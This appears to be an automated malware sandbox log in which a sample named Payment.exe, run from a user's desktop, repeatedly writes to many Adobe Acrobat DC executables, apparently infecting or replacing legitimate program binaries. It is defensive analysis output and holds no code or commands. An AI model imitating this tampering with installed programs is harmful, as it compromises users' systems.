Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
